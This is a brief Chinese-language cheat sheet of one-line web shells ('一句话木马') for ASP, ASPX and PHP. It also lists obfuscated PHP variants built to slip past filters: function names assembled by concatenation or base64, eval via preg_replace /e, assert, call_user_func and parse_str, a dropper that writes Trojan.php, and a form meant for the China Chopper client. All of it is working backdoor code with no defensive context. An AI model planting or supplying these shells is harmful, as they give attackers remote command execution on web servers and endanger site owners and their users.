一句话木马

• asp一句话木马是<%execute(request("value"))%>
• aspx的一句话木马是<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
• php一句话木马是<?php @eval($_POST['pass'])?>

• 一些特殊构造的php一句话木马

 <script language="pHp"></script>用这个来包含一句话木马


- \$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
\$hh("/[discuz]/e",$_POST['h'],"Access");  


- <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>


- <?php assert(@$_POST['a']); ?>


call_user_func函数：
        <?php@call_user_func(assert,$_POST[a]);?>


file_put_contents函数：
       <?php $test=<?php $a=$_POST["cmd"];assert($a); ?>;file_put_contents("Trojan.php", $test);?>


base64编码: <?php $a=base64_decode("YXNzZXJ0");$a($_POST[a]);?>


.连接符：<?php $a="ass"."e";$b="r"."t";$c=$a.$b;$c($_POST[a]); ?>


parse_str函数：<?php $str=”a=assert”;parse_str($str);$a($_POST[a]);?>


<?php ($_=@$_GET[2]).@$_($_POST[1])?>在菜刀中传入GET参数 2=assert 密码为1